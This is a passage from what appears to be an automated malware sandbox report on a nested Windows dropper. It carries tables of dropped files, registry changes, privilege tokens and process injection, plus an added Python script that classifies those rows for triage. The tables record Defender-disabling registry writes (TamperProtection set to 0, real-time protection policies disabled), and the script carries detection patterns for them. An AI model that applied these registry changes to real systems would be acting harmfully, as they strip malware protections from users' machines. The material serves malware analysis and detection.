N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZO32QK3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4AD4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2kf426Vj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86D5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B836.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B9AE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBC3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\436D.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe N/A
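
The registry rows in the tables above deserve different weights. 4824.exe creates the Windows Defender Real-Time Protection policy key, sets five Disable* values to 1 and sets Features\TamperProtection to 0 (it also enables SeDebugPrivilege, per the AdjustPrivilegeToken table further down); that is the concrete defence impairment behind the report's evasion tags. The wextract_cleanupN RunOnce values listed under "Adds Run key to start application" are different in kind: they are written by the Windows IExpress self-extractor stub (wextract) and only schedule rundll32 advpack.dll,DelNodeRunDLL32 to delete the IXP00N.TMP extraction folder at the next logon, so they are evidence of CAB-SFX wrapping rather than attacker-controlled persistence. What they do reveal is nesting depth: each layer extracts into the next IXP folder, and the report shows two chains starting at wextract_cleanup0, one from file.exe and one from 436D.exe. The Geo\Nation queries are a system-location check; which regions the sample excludes, if any, is not visible in the report. The Python below is an added example for this report, not the sandbox's own rule set: it parses rows in the report's "Description Indicator Process Target" layout (including process paths with spaces, such as msedge.exe under Program Files (x86)), classifies them, and reconstructs the SFX chain. The rows in SAMPLE are copied from this page, following the 436D.exe chain as far as IXP002; the category names and the MITRE references in the comments are editorial assumptions.

```python
"""Classify registry rows from a sandbox signature table laid out as above.
Added example for this report, not the sandbox's rule set: SAMPLE rows are
copied from the report; the categories and MITRE references are editorial."""
import re
from collections import defaultdict

SET_VALUE = re.compile(r'^Set value \((\w+)\) (\\REGISTRY\\.*?) = "(.*)" ([A-Za-z]:\\.*?) N/A$')
KEY_OP = re.compile(r'^Key (value queried|created|opened|queried|enumerated) '
                    r'(\\REGISTRY\\.*?) ([A-Za-z]:\\.*?) N/A$')
WEXTRACT = re.compile(r'\\RunOnce\\wextract_cleanup(\d+)$')
IXP_DIR = re.compile(r'DelNodeRunDLL32 "(.*?\\IXP\d{3}\.TMP\\)"')

def parse_indicator(line):
    """One 'Description Indicator Process Target' row -> dict, or None."""
    line = line.strip()
    m = SET_VALUE.match(line)
    if m:
        kind, key, data, proc = m.groups()
        data = re.sub(r'\\(["\\])', r'\1', data)     # undo the report's \" and \\ escaping
        return {"op": "set", "type": kind, "key": key, "data": data, "process": proc}
    m = KEY_OP.match(line)
    if m:
        op, key, proc = m.groups()
        return {"op": op, "type": None, "key": key, "data": None, "process": proc}
    return None

def classify(rec):
    key, data = rec["key"].lower(), rec["data"]
    name = key.rsplit("\\", 1)[-1]
    if r"\policies\microsoft\windows defender\real-time protection" in key:
        if rec["op"] != "set" or (name.startswith("disable") and data == "1"):
            return "defender-tamper"            # T1562.001 Impair Defenses
    if key.endswith(r"\windows defender\features\tamperprotection") and data == "0":
        return "defender-tamper"
    if WEXTRACT.search(rec["key"]) and "advpack.dll,delnoderundll32" in (data or "").lower():
        return "sfx-cleanup"                    # IExpress/wextract folder cleanup, not persistence
    if "\\currentversion\\run" in key and rec["op"] == "set":
        return "autorun"                        # T1547.001 Run/RunOnce persistence
    if key.endswith(r"\control panel\international\geo\nation"):
        return "geo-check"                      # T1614 System Location Discovery
    return "other"

def sfx_chain(records):
    """(level, writing process, folder scheduled for deletion) per wextract_cleanupN.
    Level N is written from inside IXP00(N-1).TMP, so the list length is the
    number of nested self-extractor layers seen."""
    chain = []
    for r in records:
        if classify(r) == "sfx-cleanup":
            m = IXP_DIR.search(r["data"])
            chain.append((int(WEXTRACT.search(r["key"]).group(1)), r["process"], m.group(1) if m else None))
    return sorted(chain)

def triage(lines):
    """Category -> ordered, de-duplicated list of responsible processes."""
    out = defaultdict(list)
    for rec in filter(None, map(parse_indicator, lines)):
        cat = classify(rec)
        if rec["process"] not in out[cat]:
            out[cat].append(rec["process"])
    return dict(out)

SAMPLE = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\436D.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\86D5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
""".strip().splitlines()

if __name__ == "__main__":
    for cat, procs in triage(SAMPLE).items():
        print(f"{cat}: {procs}")
    for level, proc, folder in sfx_chain([parse_indicator(l) for l in SAMPLE]):
        print(f"  layer {level}: {proc} -> cleanup of {folder}")
```

The sfx-cleanup test is checked before the generic Run/RunOnce test on purpose: a rule that fires on any RunOnce write would count every wextract layer as a persistence hit, which is how the DcRat and "Adds Run key" tables above end up listing the same wextract_cleanup0 row.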

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A (62 further matches, no indicator or process recorded)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3468 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3468 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3468 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 4272 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 4272 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 4272 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3156 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4272 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4272 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4272 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4388 wrote to memory of 1628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3468 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3468 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3468 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2624 wrote to memory of 904 N/A N/A C:\Users\Admin\AppData\Local\Temp\436D.exe
PID 2624 wrote to memory of 904 N/A N/A C:\Users\Admin\AppData\Local\Temp\436D.exe
PID 2624 wrote to memory of 904 N/A N/A C:\Users\Admin\AppData\Local\Temp\436D.exe
PID 904 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\436D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe
PID 904 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\436D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe
PID 904 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\436D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe
PID 2624 wrote to memory of 856 N/A N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe
PID 2624 wrote to memory of 856 N/A N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe
PID 2624 wrote to memory of 856 N/A N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe
PID 4684 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe
PID 4684 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe
PID 4684 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe
PID 2624 wrote to memory of 2212 N/A N/A C:\Users\Admin\AppData\Local\Temp\4563.bat
PID 2624 wrote to memory of 2212 N/A N/A C:\Users\Admin\AppData\Local\Temp\4563.bat
PID 2624 wrote to memory of 2212 N/A N/A C:\Users\Admin\AppData\Local\Temp\4563.bat
PID 4860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe
PID 4860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe
PID 4860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe
PID 2624 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\4777.exe
PID 2624 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\4777.exe
PID 2624 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\4777.exe
PID 540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe
PID 540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe
PID 540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
